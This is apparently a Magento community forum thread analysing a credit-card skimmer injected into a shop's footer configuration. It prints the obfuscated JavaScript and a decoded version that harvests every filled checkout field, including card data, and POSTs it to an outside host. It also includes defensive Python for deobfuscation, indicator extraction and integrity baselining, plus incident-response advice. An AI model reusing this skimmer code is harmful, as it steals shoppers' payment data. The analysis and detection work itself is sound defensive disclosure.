Looks similar to the GuruIncSite attack. Malicious JS injected into design/footer/absolute_footer. The JS sends CC data to a site by ajax.
We're fully patched and magereport found no known vulnerabilities, so thinking this might be a new attack vector.
The script was this
var _0xe0eb=["\x63\x68\x61\x6E\x67\x65","\x66\x6F\x72\x6D","\x73\x65\x6C\x65\x63\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6F\x70\x73\x5F\x63\x63\x5B\x79\x65\x61\x72\x5D\x22\x5D","\x73\x65\x6C\x65\x63\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x70\x61\x79\x6D\x65\x6E\x74\x5B\x63\x63\x5F\x65\x78\x70\x5F\x79\x65\x61\x72\x5D\x22\x5D","\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x65\x78\x70\x69\x72\x61\x74\x69\x6F\x6E\x22\x5D","\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x66\x75\x6C\x6C\x5F\x63\x63\x5F\x65\x78\x70\x69\x72\x61\x74\x69\x6F\x6E\x22\x5D","\x73\x65\x6C\x65\x63\x74\x5B\x69\x64\x3D\x22\x72\x65\x64\x65\x63\x61\x72\x64\x5F\x65\x78\x70\x69\x72\x61\x74\x69\x6F\x6E\x5F\x79\x72\x22\x5D","\x6C\x65\x6E\x67\x74\x68","\x76\x61\x6C","","\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","\x6A\x69\x6B","\x2D","\x72\x65\x70\x6C\x61\x63\x65","\x3D","\x26","\x26\x69\x64\x64\x3D","\x68\x6F\x73\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x6A\x2D\x6D\x6F\x64\x2E\x6C\x69\x6E\x6B\x2F\x6D\x61\x67\x2E\x70\x68\x70","\x50\x4F\x53\x54","\x6A\x73\x6F\x6E","\x61\x6A\x61\x78","\x6F\x6E"];setTimeout(function(){jQuery(function(_0x9760x1){_0x9760x1(document)[_0xe0eb[26]](_0xe0eb[0],_0xe0eb[1],function(){grelos_v= null;a= [_0xe0eb[2],_0xe0eb[3],_0xe0eb[4],_0xe0eb[5],_0xe0eb[6]];for(var _0x9760x2=0;_0x9760x2< 5;_0x9760x2++){try{if(_0x9760x1(a[_0x9760x2])[_0xe0eb[8]]()[_0xe0eb[7]]> 0){_0x9760x3()}}catch(e){}};function _0x9760x3(){var _0x9760x4=_0xe0eb[9];var _0x9760x5=document[_0xe0eb[11]](_0xe0eb[10]);for(var _0x9760x6=0;_0x9760x6< _0x9760x5[_0xe0eb[7]];_0x9760x6++){if(_0x9760x5[_0x9760x6][_0xe0eb[12]][_0xe0eb[7]]> 0){var _0x9760x7=_0x9760x5[_0x9760x6][_0xe0eb[13]];if(_0x9760x7== _0xe0eb[9]){_0x9760x7= _0xe0eb[14]+ _0x9760x6};var 
_0x9760x8=_0x9760x7[_0xe0eb[16]](/\[/g,_0xe0eb[15]);var _0x9760x9=_0x9760x8[_0xe0eb[16]](/-redecard/,_0xe0eb[9]);_0x9760x4+= _0x9760x9[_0xe0eb[16]](/]/g,_0xe0eb[9])+ _0xe0eb[17]+ _0x9760x5[_0x9760x6][_0xe0eb[12]]+ _0xe0eb[18]}};_0x9760x4= _0x9760x4+ _0xe0eb[19]+ window[_0xe0eb[21]][_0xe0eb[20]];_0x9760x1[_0xe0eb[25]]({url:_0xe0eb[22],data:_0x9760x4,type:_0xe0eb[23],dataType:_0xe0eb[24],success:function(_0x9760xa){return false},error:function(_0x9760xb,_0x9760xc,_0x9760xd){return false}})}})})},5000)
Decoded (string table resolved to literals, variables renamed, comments added), it looks like this:
// Waits 5 s after page load so it runs after the checkout JS has initialised
setTimeout(function () {
  jQuery(function ($) {
    // Hook every "change" event that bubbles up from any <form> on the page
    $(document).on("change", "form", function () {
      grelos_v = null;
      // Card-expiry-year fields of several payment modules; a filled expiry year
      // is taken as the signal that the rest of the card form has been completed
      var expiryFields = [
        'select[name="ops_cc[year]"]',
        'select[name="payment[cc_exp_year]"]',
        'input[name="expiration"]',
        'input[name="full_cc_expiration"]',
        'select[id="redecard_expiration_yr"]'
      ];
      for (var i = 0; i < 5; i++) {
        try {
          if ($(expiryFields[i]).val().length > 0) { exfiltrate(); }
        } catch (e) {}
      }
      function exfiltrate() {
        var payload = "";
        // Every non-empty field on the page, not just the card fields
        // ("checkbox" is not an element name, so that part matches nothing)
        var fields = document.querySelectorAll("input, select, textarea, checkbox");
        for (var j = 0; j < fields.length; j++) {
          if (fields[j].value.length > 0) {
            var name = fields[j].name;
            if (name == "") { name = "jik" + j; }   // unnamed fields get a synthetic key
            // payment[cc_number] -> payment-cc_number; drop any "-redecard" suffix
            var key = name.replace(/\[/g, "-").replace(/-redecard/, "");
            payload += key.replace(/]/g, "") + "=" + fields[j].value + "&";
          }
        }
        // Tag the data with the victim shop's hostname
        payload = payload + "&idd=" + window.location.host;
        $.ajax({
          url: "https://sj-mod.link/mag.php",
          data: payload,
          type: "POST",
          dataType: "json",
          success: function (r) { return false; },
          error: function (xhr, status, err) { return false; }
        });
      }
    });
  });
}, 5000);
Not sure how they gained access yet, but I'm finding very, very little on this.
Related URLs are:
sj-mods.link
sj-mods.link/mag.php
sj-mods.link/mage.js
sj-mods.link/sj-mods/mage.js
URLs similar to this on the same server are using js-save.link; there are probably more.
In the code there is a grelos_v variable, which also appears in this: https://community.magento.com/t5/Security-Patches/Security-Issue-with-Magento-1-9-x-x-ccard-js/td-p/... Our ccard.js is clean, so it doesn't look like they got in using that.
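The obfuscation in the posted script is a hex-escaped string table plus _0xe0eb[n] lookups, which can be resolved mechanically instead of by hand. The following Python is an added example, not code from this thread or from Magereport: it takes a constructed, shortened copy of the posted sample (a few real table entries and two statements, so it runs offline), rewrites every table reference into its literal, and pulls out the exfiltration URL and the event hook as indicators. The regexes assume the obfuscator's layout seen above (a `var _0xNNNN=[...]` table of double-quoted strings, referenced by integer index).

```python
# Resolve a hex-escaped string-table JS obfuscation (var _0xNNNN=[...]; _0xNNNN[i])
# and extract indicators. Added example, not from the thread.
import json
import re

# Constructed, shortened copy of the posted sample: six real table entries and two
# statements that reference them. The full sample is about 2 KB.
SAMPLE = r'''var _0xe0eb=["\x63\x68\x61\x6E\x67\x65","\x66\x6F\x72\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x6A\x2D\x6D\x6F\x64\x2E\x6C\x69\x6E\x6B\x2F\x6D\x61\x67\x2E\x70\x68\x70","\x50\x4F\x53\x54","\x61\x6A\x61\x78","\x6F\x6E"];jQuery(document)[_0xe0eb[5]](_0xe0eb[0],_0xe0eb[1],function(){jQuery[_0xe0eb[4]]({url:_0xe0eb[2],type:_0xe0eb[3]})});'''

TABLE_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[((?:\s*"(?:[^"\\]|\\.)*"\s*,?)*)\]\s*;?')
STR_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
ESC_RE = re.compile(r'\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|\\(.)')
URL_RE = re.compile(r'https?://')


def unescape_js(s):
    # Decode the hex (2 digits), unicode (4 digits) and simple backslash escapes of a JS string body
    def one(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 16))
        return {"n": "\n", "r": "\r", "t": "\t"}.get(m.group(3), m.group(3))
    return ESC_RE.sub(one, s)


def deobfuscate(js):
    """Return (string_table, code) with every table[i] reference replaced by its literal."""
    m = TABLE_RE.search(js)
    if not m:
        raise ValueError("no _0x string table found")
    name = m.group(1)
    table = [unescape_js(s) for s in STR_RE.findall(m.group(2))]
    ref = re.compile(re.escape(name) + r'\[(\d+)\]')
    code = js[:m.start()] + js[m.end():]            # drop the table declaration itself
    code = ref.sub(lambda r: json.dumps(table[int(r.group(1))]), code)
    # obj["prop"] -> obj.prop where the key is identifier-like; readability only
    code = re.sub(r'\["([A-Za-z_$][A-Za-z0-9_$]*)"\]', r'.\1', code)
    return table, code


def indicators(table, code):
    """The pieces an analyst wants first: where the data goes and what triggers sending it."""
    return {
        "urls": sorted(s for s in table if URL_RE.match(s)),
        "selectors": [s for s in table if re.match(r'(input|select|textarea)\[', s)],
        "hooks": re.findall(r'\.on\("(\w+)",\s*"(\w+)"', code),
        "methods": sorted(s for s in table if s in ("GET", "POST", "ajax", "fetch")),
    }


def analyze(js=SAMPLE):
    table, code = deobfuscate(js)
    return {"table": table, "code": code, "iocs": indicators(table, code)}


if __name__ == "__main__":
    result = analyze()
    print(result["code"])
    print(result["iocs"])
```

Running it against the full sample from the thread instead of the shortened copy yields the same table the decoded listing above shows, with the five expiry-field selectors turning up under "selectors". Extracting the URL from the resolved table rather than from the raw script is the point: the hostname never appears in clear text in the obfuscated form, so a grep for the domain alone would miss it.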
Usually Magento is not the only attack vector. Sometimes the computer has other packages installed, with holes left unplugged. Sometimes Magento is just an innocent bystander which is now used to redistribute the payload.
Did you check magereport.com?
Also, sometimes a worm stays dormant after gaining access to the system and wakes up weeks or months later. It could very well be that it's been in the system for a while.
I did check magereport and it found nothing to report.
I came across this from 21 days ago, reporting something similar and suggesting it was an SQL injection: https://safeweb.norton.com/reviews/314807
This is a pretty bad hack, as you're losing card details. If it truly comes from SQL injection, you should find the vulnerability ASAP, as it will only happen again until it's fixed.
You can grep through your logs for SQL injections quite easily, but it can be CPU intensive if you have large logs on a low-powered server.
Even though you are using the latest version of Magento, there are many other possibilities which may compromise security.
Such as custom modules, a virus-infected system used to access and deploy code, admin users which were created in the past but not deactivated, and not following Magento best practices.
Remove all suspicious files and IP-restrict admin access for your Magento site.
That's what we're currently doing: we're auditing everything and scanning our logs for brute force attempts and SQL injection attempts.
We follow best practices and have our own. We regularly patch our servers and the software installed, servers are locked down as much as we can, PHP is only runnable in very specific directories, etc. We've still not found the point of entry, so to speak, but once we do I'll keep this thread up to date. We're leaning towards the site admins having really awful passwords at this point.
You could look at installing a FIM (like http://www.tripwire.com/it-security-software/scm/file-integrity-monitoring/) as a short-term protection until you have found the insecurity.
It may even help find the breach for you.
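An added example of the file-integrity baseline idea suggested above (not Tripwire's code and not the thread's): hash every file under a Magento docroot, store the manifest, and diff a later snapshot against it. One caveat that matters for this particular infection: the injected script at the top of this thread sat in design/footer/absolute_footer, which Magento stores in the core_config_data table rather than in a file, so a file-only FIM would never see it. The same diff is therefore run over a dump of that table as well. The docroot, its files and the config rows are all constructed inside a temporary directory so the demo runs offline.

```python
# SHA-256 baseline/compare for a Magento docroot and for core_config_data rows.
# Added example; not Tripwire's code or the thread's.
import hashlib
import os
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot_tree(root, skip=("var",)):
    """relative path -> sha256 for every file under root. var/ (cache, sessions, logs)
    is skipped because it churns constantly and would bury real changes in noise."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        if rel != "." and any(rel == s or rel.startswith(s + "/") for s in skip):
            dirnames[:] = []        # do not descend into the skipped tree
            continue
        for name in filenames:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_file(full)
    return manifest


def snapshot_config(rows):
    """rows: (path, value) pairs as selected from core_config_data, hashed the same way,
    because design/footer/absolute_footer and design/head/includes live there, not on disk."""
    return {path: hashlib.sha256((value or "").encode("utf-8")).hexdigest() for path, value in rows}


def diff(baseline, current):
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
    }


def write_files(root, files):
    for rel, data in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(data)


def demo():
    """Constructed docroot and config rows: take a baseline, simulate a compromise, compare."""
    with tempfile.TemporaryDirectory() as root:
        write_files(root, {
            "app/etc/local.xml": b"<config/>",
            "skin/frontend/base/default/js/ccard.js": b"// clean\n",
            "var/cache/mage--1": b"cache",
        })
        base_files = snapshot_tree(root)
        base_cfg = snapshot_config([("design/footer/absolute_footer", ""),
                                    ("design/head/includes", "")])
        # Simulated compromise: one file changed, one dropped, skimmer stored in the footer config
        write_files(root, {
            "skin/frontend/base/default/js/ccard.js": b"// clean\nvar grelos_v=null;\n",
            "media/.cache.php": b"<?php /* dropped file, constructed for the demo */ ?>",
        })
        cur_files = snapshot_tree(root)
        cur_cfg = snapshot_config([("design/footer/absolute_footer", "<script>var _0xe0eb=[];</script>"),
                                   ("design/head/includes", "")])
        return {"files": diff(base_files, cur_files), "config": diff(base_cfg, cur_cfg)}


if __name__ == "__main__":
    print(demo())
```

For this to help find a breach rather than just confirm one, the baseline manifest must be written somewhere the web server's user cannot modify, and the comparison run from a cron job or a separate host; a manifest that sits in the docroot is just another file for the intruder to update.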
Thanks for reporting, we're adding this fingerprint to Magereport right now.
According to a quick check, some 500 other shops appear infected with this particular malware.
Correction: some 1200 shops, on top of the shops that are infected with already known malware.